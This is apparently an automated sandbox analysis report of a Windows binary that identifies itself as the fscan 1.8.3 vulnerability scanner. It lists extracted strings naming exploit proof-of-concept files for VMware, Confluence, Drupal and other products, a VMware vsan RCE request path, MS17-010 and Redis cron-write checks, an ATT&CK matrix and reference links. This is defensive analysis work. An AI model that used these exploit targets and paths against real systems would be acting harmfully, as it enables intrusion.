Source: java.exeBinary or memory string: failed to construct HKDF label: %shttp2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed response bodystream error: stream ID %d; %v; %vframe_settings_window_size_too_bigframe_windowupdate_zero_inc_streamhttp: MultipartReader called twiceunsupported authentication method pocs/CVE-2022-22954-VMware-RCE.ymlpocs/Hotel-Internet-Manage-RCE.ymlpocs/activemq-default-password.ymlpocs/confluence-cve-2021-26084.ymlpocs/dedecms-cve-2018-7700-rce.ymlpocs/discuz-wooyun-2010-080723.ymlpocs/drupal-cve-2014-3704-sqli.ymlpocs/ecology-javabeanshell-rce.ymlpocs/ecology-syncuserinfo-sqli.ymlpocs/f5-tmui-cve-2020-5902-rce.ymlpocs/joomla-cve-2015-7297-sqli.ymlpocs/joomla-cve-2017-8917-sqli.ymlpocs/nsfocus-uts-password-leak.ymlpocs/phpunit-cve-2017-9841-rce.ymlpocs/rabbitmq-default-password.ymlpocs/ruoyi-management-fileread.ymlpocs/seeyon-wooyun-2015-148227.ymlpocs/solarwinds-cve-2020-10148.ymlpocs/spon-ip-intercom-ping-rce.ymlpocs/springboot-cve-2021-21234.ymlpocs/springcloud-cve-2019-3799.ymlpocs/tomcat-cve-2017-12615-rce.ymlpocs/webmin-cve-2019-15107-rce.ymlpocs/yonyou-grp-u8-sqli-to-rce.ymldid not expect port number to be 0flag provided but not defined: -%sin \u hexadecimal character escapeexpected comma after array elementtoo many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: driver: remove argument from querycan't parse %q as a decimal numbercrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapno available servers to connect tounsupported authentication serviceinvalid padding bits in BIT STRINGtls: invalid certificate signaturecrypto/rc4: invalid buffer overlapoverload already has a binding: %sfunction already has a binding: %s(ruoyi/login.js|ruoyi/js/ry-ui.js)
Source: java.exeBinary or memory string: - https://www.vmware.com/security/advisories/VMSA-2021-0004.html
Source: java.exeBinary or memory string: name: poc-yaml-vmware-vcenter-arbitrary-file-read
Source: java.exeBinary or memory string: SigEd25519 no Ed25519 collisionsed25519: bad private key length: regexp: unhandled case in compileno encoder registered for name %qencoding: missing byte order markCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWexpected type '%s' but found '%s'unexpected character, wanted '||'unexpected character, wanted '&&'no support for proto1 MessageSets%s contains irreversible value %qno support for proto1 weak fieldsinvalid SetUnknown on nil Messagescalar has high bit set illegallyGODEBUG sys/cpu: can not enable "could not format value for %v: %vfailed to login with anonymous: %s[-] Hash is error,hex decode error: day-of-year does not match month3552713678800500929355621337890625reflect: Method index out of rangereflect: ChanDir of non-chan type reflect: Field of non-struct type reflect: Field index out of boundsreflect.FuncOf: too many argumentsreflect.StructOf: duplicate field " is anonymous but has PkgPath setreflect: string index out of rangereflect: recv on send-only channelreflect: send on recv-only channelreflect.Value.Grow: slice overflowbytes: Join output length overflowdid not find expected node contentinvalid length of a UTF-8 sequencecontrol characters are not allowedcrypto/aes: invalid buffer overlapillegal base64 data at input byte NoDefaultCurrentDirectoryInExePathslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timersql: expected %d arguments, got %dunpaired removeDep: no deps for %TAcquireCredentialsHandle failed %xserver does not support encryptionunexpected fed auth info opt ID %dunsupported type %T, a slice of %sinvalid operation on closed objectBFile col/par requires BFile value\(\s*HOST\s*=\s*([A-z0-9._%+-]+)\)unknown response during CopyIn: %qinvalid_xml_processing_instructionprohibited_sql_statement_attemptedfdw_dynamic_parameter_value_neededfdw_unable_to_establish_connectionunsupported Capability type 0x%04xUnhandled saveSessionInfo type 0x%ssh: must Accept or Reject channelsk-ecdsa-sha2-nistp256@openssh.comdiffie-hellman-group-exchange-sha1ssh: private key unexpected lengtharray of non-uint8 in field %d: %Texpected an RSA public key, got %Tconnection doesn't support Ed25519tls: malformed key_share extensionTLS 1.3, server CertificateVerifyTLS 1.3, client CertificateVerifyfailed to construct HKDF label: %shttp2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed response bodystream error: stream ID %d; %v; %vframe_settings_window_size_too_bigframe_windowupdate_zero_inc_streamhttp: MultipartReader called twiceunsupported authentication method pocs/CVE-2022-22954-VMware-RCE
Source: java.exeBinary or memory string: name: poc-yaml-CVE-2022-22954-VMware-RCE
Source: java.exeBinary or memory string: GSiS(VMware vSphere)IBM-Lotus-Domino
Source: java.exeBinary or memory string: description: "CVE-2022-22954-VMware-RCE by chaosec
Source: java.exeBinary or memory string: description: "vmware vCenter unauth RCE cve-2021-21985"
Source: java.exeBinary or memory string: name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
Source: java.exeBinary or memory string: |i18ninit.min.js)anypb.UnmarshalNew() failed for type %q: %vThe specified process is not part of a job.The resume flag to a timer API was ignored.Debugger printed an exception on control C.{Out of Paper} The printer is out of paper.{Device Busy} The device is currently busy.{Media Changed} The media may have changed.A device that does not exist was specified.An invalid volume label has been specified.An I/O adapter hardware error has occurred.The requested print file has been canceled.A requested opened file is not a directory.Short names are not enabled on this volume.DFS is unavailable on the contacted server.There are no EFS keys defined for the user.{EXCEPTION} Multiple floating-point faults.The volume change journal is being deleted.The device will not start without a reboot.The requested operation requires elevation.The file server is temporarily unavailable.The binding handle is not the correct type.The RPC protocol sequence is not supported.No protocol sequences have been registered.The binding does not contain an entry name.A security package-specific error occurred.A translator failed to translate resources.The referenced assembly could not be found.A monitor descriptor could not be obtained.IPsec dropped a packet due to DOS throttle.The system does not support RAID-5 volumes.cipher: incorrect nonce length given to CCMtransform: inconsistent byte count returnedunable to unescape octal sequence in stringfile %q has a package name conflict over %v%s: signs of seconds and nanos do not matchedwards25519: invalid point encoding lengthThe specified transition type is not valid.invalid message type 0x%02X in SMB1 responsefailed to get SMB1 response about header: %s[+] MS17-010 %s has DOUBLEPULSAR SMB IMPLANT[+] Redis %v like can write /var/spool/cron/mult128bitPow10: power of 10 is out of rangereflect: call of MakeFunc with non-Func typereflect: FieldByNameFunc of non-struct type reflect: funcLayout with interface receiver using value obtained using unexported fieldreflect: function created by MakeFunc using reflect: Value.SetIterKey called before Nextreflect: slice length out of range in SetLenyaml internal error: please report the issueneither tag nor implicit flags are specifiedmapping keys are not allowed in this contextdid not find expected digit or '.' characteruse of WriteTo with pre-connected connectioncipher: NewGCM requires 128-bit block cipherencoding alphabet contains newline characterspan on userArena.faultList has invalid sizeruntime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not supportedcannot trace user goroutine on its own stackunsafe.Slice: ptr is nil and len is not zeromssql: invalid type for Binary column: %T %sStarting federated authentic
Source: java.exeBinary or memory string: name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972
Source: java.exeBinary or memory string: - https://swarm.ptsecurity.com/unauth-rce-vmware/name: poc-yaml-youphptube-encoder-cve-2019-5127
Source: java.exeBinary or memory string: E-mobileweaver-ebridgeVMware vSphere(nagios admin)(zfoausername)(X-Confluence)reserved_rangeexplicit,tag:1zero parameterneed more dataInstEmptyWidthNegotiateFlag(ControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDOpenSCManagerWSetThreadTokenCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWsubtract_int64multiply_int64int64_to_int64string_to_boolbool_to_stringbytes_to_bytesmatches_stringless_timestampgreater_uint64greater_doublegreater_stringLABEL_OPTIONALLABEL_REQUIREDLABEL_REPEATED(line %d:%d): invalid %v: %vinvalid kind: protobuf_oneofXXX_OneofFuncsStack is emptyMatchATN mode LL altSubSets=Not ComparableGREATER_EQUALSconditionalAndprotobuf errorReservedRangesSCRIPT_FILENAMESERVER_SOFTWARESERVER_PROTOCOLtrying RunIcmp2ping -n 1 -w 1 wait connect ok[+] Redis %s %sWindows\win.iniread key failedAccept-LanguageALIYUN-SECURITY135,137,139,445Set web timeout: cannot parse ,M3.2.0,M11.1.0476837158203125GetProcessTimesDuplicateHandlenegative offsetinvalid argSize<invalid Value>not implementedmissing address/etc/mdns.allowunknown networkinvalid paddingAUTH command OKwrite heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockmalloc deadlockruntime error: elem size wrong with GC prog
Source: java.exeBinary or memory string: name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
Source: java.exe, 00000000.00000002.1667214645.00000192836D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: java.exeBinary or memory string: vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\java.exeQueries volume information: C:\Users\user\Desktop\java.exe VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
1
Software Packing
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1431417 Sample: java.exe Startdate: 25/04/2024 Architecture: WINDOWS Score: 22 5 java.exe 1 2->5         started        signatures3 10 Exploit detected, runtime environment starts unknown processes 5->10 8 conhost.exe 5->8         started        process4

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%0%Avira URL Cloudsafe
https://www.cnvd.org.cn/flaw/show/CNVD-2021-345680%Avira URL Cloudsafe
https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html0%Avira URL Cloudsafe
https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac870%Avira URL Cloudsafe
https://docs.min.io/cn/0%Avira URL Cloudsafe
https://www.ohlinge.cn)0%Avira URL Cloudsafe
http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%0%Avira URL Cloudsafe
http://wx.weaver)(0%Avira URL Cloudsafe
https://www.cnvd.org.cn/flaw/show/CNVD-2021-345680%VirustotalBrowse
https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac870%VirustotalBrowse
https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%0%Avira URL Cloudsafe
http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E4%B8%89%E0%Avira URL Cloudsafe
https://docs.min.io/cn/0%VirustotalBrowse
https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html0%VirustotalBrowse
https://hackfun.org/)0%Avira URL Cloudsafe
http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A80%Avira URL Cloudsafe
http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%0%VirustotalBrowse
http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%E0%Avira URL Cloudsafe
https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%0%VirustotalBrowse
http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-80%Avira URL Cloudsafe
http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E4%B8%89%E0%VirustotalBrowse
http://www.polaris-lab.com/index.php/archives/253/0%Avira URL Cloudsafe
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-15480%Avira URL Cloudsafe
http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%E0%VirustotalBrowse
https://hackfun.org/)1%VirustotalBrowse
http://api.ceye.io/v1/records?token=%s&type=dns&filter=%sssh:0%Avira URL Cloudsafe
https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2name:0%Avira URL Cloudsafe
http://www.polaris-lab.com/index.php/archives/253/0%VirustotalBrowse
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-15480%VirustotalBrowse
http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%0%VirustotalBrowse
http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A80%VirustotalBrowse
https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2name:0%VirustotalBrowse
http://api.ceye.io/v1/records?token=%s&type=dns&filter=%sssh:3%VirustotalBrowse
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://www.anquanke.com/post/id/239865java.exefalse
    high
    https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQname:java.exefalse
      high
      https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.htmljava.exefalse
        high
        https://docs.min.io/cn/java.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%java.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019java.exefalse
          high
          https://github.com/jweny)java.exefalse
            high
            https://www.seebug.org/vuldb/ssvid-97265java.exefalse
              high
              https://www.seebug.org/vuldb/ssvid-97267java.exefalse
                high
                https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635java.exefalse
                  high
                  https://nvd.nist.gov/vuln/detail/CVE-2020-27986java.exefalse
                    high
                    https://www.seebug.org/vuldb/ssvid-97266java.exefalse
                      high
                      https://github.com/jas502n/CVE-2019-6340java.exefalse
                        high
                        https://www.oracle.com/security-alerts/alert-cve-2020-14750.htmljava.exefalse
                          high
                          https://www.seebug.org/vuldb/ssvid-97268java.exefalse
                            high
                            https://github.com/JrDw0/)java.exefalse
                              high
                              https://blog.csdn.net/fnmsd/article/details/88657083java.exefalse
                                high
                                https://www.cnvd.org.cn/flaw/show/CNVD-2021-34568java.exefalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/2357000166)java.exefalse
                                  high
                                  https://github.com/whami-root)java.exefalse
                                    high
                                    https://github.com/neverendxxxxxx)java.exefalse
                                      high
                                      https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.htmljava.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://s.tencent.com/research/bsafe/1228.htmljava.exefalse
                                        high
                                        https://github.com/Print1n)java.exefalse
                                          high
                                          https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/loginjava.exefalse
                                            high
                                            https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac87java.exefalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%java.exefalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://yq.aliyun.com/articles/616757java.exefalse
                                              high
                                              https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.pyjava.exefalse
                                                high
                                                https://github.com/Sup3rm4nx0x)java.exefalse
                                                  high
                                                  https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlwjava.exefalse
                                                    high
                                                    https://github.com/CouchCMS/CouchCMS/issues/46java.exefalse
                                                      high
                                                      https://github.com/kzaopa)java.exefalse
                                                        high
                                                        https://www.ohlinge.cn)java.exefalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        https://blog.csdn.net/dfdhxb995397/article/details/101385340java.exefalse
                                                          high
                                                          https://hub.docker.com/r/petergrace/opentsdb-dockerjava.exefalse
                                                            high
                                                            https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2java.exefalse
                                                              high
                                                              https://blog.csdn.net/zy15667076526/article/details/111413979java.exefalse
                                                                high
                                                                http://wx.weaver)(java.exefalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                https://www.twilio.com/blog/2017/08/http-requests-in-node-js.htmlname:java.exefalse
                                                                  high
                                                                  https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%java.exefalse
                                                                  • 0%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://xz.aliyun.com/t/5299java.exefalse
                                                                    high
                                                                    https://github.com/goharbor/harbor/issues/8951java.exefalse
                                                                      high
                                                                      https://www.cnblogs.com/-mo-/p/11295400.htmljava.exefalse
                                                                        high
                                                                        https://github.com/Loneyers/vuldocker/tree/master/next.jsjava.exefalse
                                                                          high
                                                                          https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8Ajava.exefalse
                                                                            high
                                                                            https://github.com/WhiteHSBG)java.exefalse
                                                                              high
                                                                              http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E4%B8%89%Ejava.exefalse
                                                                              • 0%, Virustotal, Browse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://github.com/shadown1ng)java.exefalse
                                                                                high
                                                                                https://hackfun.org/)java.exefalse
                                                                                • 1%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cloud.tencent.com/developer/article/1472550java.exefalse
                                                                                  high
                                                                                  https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAegjava.exefalse
                                                                                    high
                                                                                    https://github.com/Sndav)java.exefalse
                                                                                      high
                                                                                      https://cwiki.apache.org/confluence/display/AMBARI/Quickjava.exefalse
                                                                                        high
                                                                                        https://kb.cert.org/vuls/id/843464name:java.exefalse
                                                                                          high
                                                                                          http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8java.exefalse
                                                                                          • 0%, Virustotal, Browse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861name:java.exefalse
                                                                                            high
                                                                                            https://www.seebug.org/vuldb/ssvid-98364java.exefalse
                                                                                              high
                                                                                              http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%Ejava.exefalse
                                                                                              • 0%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://github.com/masahiro331/CVE-2019-10758java.exefalse
                                                                                                high
                                                                                                https://medium.com/java.exefalse
                                                                                                  high
                                                                                                  https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.htmljava.exefalse
                                                                                                    high
                                                                                                    https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rcename:java.exefalse
                                                                                                      high
                                                                                                      https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071java.exefalse
                                                                                                        high
                                                                                                        https://blog.csdn.net/ge00111/article/details/72765210name:java.exefalse
                                                                                                          high
                                                                                                          https://github.com/tangxiaofeng7)java.exefalse
                                                                                                            high
                                                                                                            https://t.co/LfvbyBUhF5java.exefalse
                                                                                                              high
                                                                                                              http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8java.exefalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548java.exefalse
                                                                                                              • 0%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.cnblogs.com/milantgh/p/3615986.htmljava.exefalse
                                                                                                                high
                                                                                                                https://s.tencent.com/research/bsafe/474.htmlname:java.exefalse
                                                                                                                  high
                                                                                                                  https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193java.exefalse
                                                                                                                    high
                                                                                                                    https://xz.aliyun.com/t/7219java.exefalse
                                                                                                                      high
                                                                                                                      https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c7java.exefalse
                                                                                                                        high
                                                                                                                        https://github.com/YMFE/yapi/issues/2229java.exefalse
                                                                                                                          high
                                                                                                                          https://github.com/vulhub/vulhub/tree/master/spark/unaccAnjava.exefalse
                                                                                                                            high
                                                                                                                            https://www.tenable.com/cve/CVE-2020-14181java.exefalse
                                                                                                                              high
                                                                                                                              https://github.com/ThestaRY7/)java.exefalse
                                                                                                                                high
                                                                                                                                https://github.com/notwhy)java.exefalse
                                                                                                                                  high
                                                                                                                                  https://nifi.apache.org/docs/nifi-docs/rest-api/index.htmljava.exefalse
                                                                                                                                    high
                                                                                                                                    http://www.polaris-lab.com/index.php/archives/253/java.exefalse
                                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://github.com/PickledFish)java.exefalse
                                                                                                                                      high
                                                                                                                                      http://api.ceye.io/v1/records?token=%s&type=dns&filter=%sssh:java.exefalse
                                                                                                                                      • 3%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.t00ls.net/articles-54436.htmljava.exefalse
                                                                                                                                        high
                                                                                                                                        https://github.com/whami-rootname:java.exefalse
                                                                                                                                          high
                                                                                                                                          http://www.baidu.com/search/error.htmljava.exefalse
                                                                                                                                            high
                                                                                                                                            https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723java.exefalse
                                                                                                                                              high
                                                                                                                                              https://www.secpulse.com/archives/496.htmlname:java.exefalse
                                                                                                                                                high
                                                                                                                                                https://github.com/Mr-xn/spring-core-rcejava.exefalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/FiveAourThe)java.exefalse
                                                                                                                                                    high
                                                                                                                                                    https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2name:java.exefalse
                                                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://nvd.nist.gov/vuln/detail/CVE-2018-17246java.exefalse
                                                                                                                                                      high
                                                                                                                                                      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738java.exefalse
                                                                                                                                                        high
                                                                                                                                                        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736java.exefalse
                                                                                                                                                          high
                                                                                                                                                          https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737java.exefalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdjava.exefalse
                                                                                                                                                              high
                                                                                                                                                              https://www.cnblogs.com/xiexiandong/p/12888582.htmljava.exefalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704name:java.exefalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/B1anda0)java.exefalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/hackgov)java.exefalse
                                                                                                                                                                      high
                                                                                                                                                                      No contacted IP infos
                                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                      Analysis ID:1431417
                                                                                                                                                                      Start date and time:2024-04-25 03:41:13 +02:00
                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 2m 41s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                      Number of analysed new started processes analysed:2
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Sample name:java.exe
                                                                                                                                                                      Detection:SUS
                                                                                                                                                                      Classification:sus22.expl.winEXE@2/1@0/0
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      • Stop behavior analysis, all processes terminated
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      No simulations
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      Process:C:\Users\user\Desktop\java.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):260
                                                                                                                                                                      Entropy (8bit):2.604604956516603
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:C/FncgGV5Kx36K9p2KsIx5gj3VCBf9Fn4oKFv:SFUKP9p1xuABf9FntKFv
                                                                                                                                                                      MD5:6A38D18EE21E2BFF3B0A1B3D4873E3E6
                                                                                                                                                                      SHA1:2D61F5D2D026DC33CE6BF0604FCC97B5DF6AEBB0
                                                                                                                                                                      SHA-256:1F40A793F2C4CA948F8D7E93DC00BE2C86DB6019666360705DBB039D6CF23D67
                                                                                                                                                                      SHA-512:A4C1A4412A4713E753F476AC84C8DCDD1A7A61717C5528D92FBCEA746F581FE4F9CB6E873CD871FB5B6FC000CE7E18F38989850F180D7DC7E9AEDF6E4CF267FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:. ___ _ . / _ \ ___ ___ _ __ __ _ ___| | __ . / /_\/____/ __|/ __| '__/ _` |/ __| |/ /./ /_\\_____\__ \ (__| | | (_| | (__| < .\____/ |___/\___|_| \__,_|\___|_|\_\ . fscan version: 1.8.3.
                                                                                                                                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.403086881227994
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
